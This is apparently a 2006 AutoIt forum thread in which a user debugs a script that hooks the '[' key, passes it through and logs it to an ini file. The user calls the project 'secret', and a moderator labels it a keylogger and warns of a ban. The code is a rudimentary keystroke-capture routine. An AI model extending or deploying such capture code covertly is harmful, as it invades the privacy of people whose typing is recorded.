Glyph 2 Report post Posted December 9, 2006 #Include <process.au3> Dim $Filfe = "" HotKeySet("[", "_bl") ; / HotKeySet ( "^!e" , "quit") While 1 sleep(366*1044) WEnd Func quit() exit endfunc Func _bl() HotKeySet ( "[") send("[") HotKeySet ( "[" , "_bl" ) EndFunc Func OnAutoItExit() $file = FileOpen("bracketl.ini", 1) FileWrite($file, $filfe) FileClose($file) EndFunc See anything wrong with this?, it wont send " [ ", i tried a few variations and still wont do what i want! tolle indicium Share this post Link to post Share on other sites
James 374 Report post Posted December 9, 2006 Its the same problem you had with the / filfe Blog - Seriously epic web hosting - Twitter - GitHub - Cachet HQ Share this post Link to post Share on other sites
Glyph 2 Report post Posted December 9, 2006 #Include <process.au3> Dim $Filfe = "" HotKeySet("[", "_bl") ; / HotKeySet ( "^!e" , "quit") While 1 sleep(366*1044) WEnd Func quit() exit endfunc Func _bl() HotKeySet ( "[") Send("{[}") $filfe = $filfe & "[" HotKeySet ( "[" , "_bl" ) EndFunc Func OnAutoItExit() $file = FileOpen("bracketl.ini", 1) FileWrite($file, $filfe) FileClose($file) EndFunc Still doesn't work Oo! tolle indicium Share this post Link to post Share on other sites
James 374 Report post Posted December 9, 2006 Hmm.. Im not sure what else then. Just a question, what are you making these for? Blog - Seriously epic web hosting - Twitter - GitHub - Cachet HQ Share this post Link to post Share on other sites
BigDod 505 Report post Posted December 9, 2006 Your original code works for me (ie it sends [) Get Beta versions Here Get latest SciTE editor Here AutoIt 1-2-3 by Valuater - A great starting point.Time you enjoyed wasting is not wasted time ......T.S. ElliotSuspense is worse than disappointment................Robert BurnsGod help the man who won't help himself, because no-one else will...........My Grandmother Share this post Link to post Share on other sites
Glyph 2 Report post Posted December 9, 2006 (edited) It's a file im making i realease soon!, for now its secret!!! hmm, well the original code isn't working for me, im using the latest beta of autoit... Edited December 9, 2006 by backstabbed tolle indicium Share this post Link to post Share on other sites
bayangan 0 Report post Posted December 9, 2006 First example works for me when i tried on a notepad Share this post Link to post Share on other sites
Glyph 2 Report post Posted December 9, 2006 (edited) hmm, ima redo this then.. ill tell ya how it goes! -edit Ok it sends it fine, it's just not sending it to the ini file now :/ -edit again What the heck?, its fine now... Edited December 9, 2006 by backstabbed tolle indicium Share this post Link to post Share on other sites
Valik 471 Report post Posted December 10, 2006 It's a file im making i realease soon!, for now its secret!!!If you release it on this forum, you'll be banned for awhile, I can tell you that much right now. Whether you want to call this a keylogger or not, it is. Share this post Link to post Share on other sites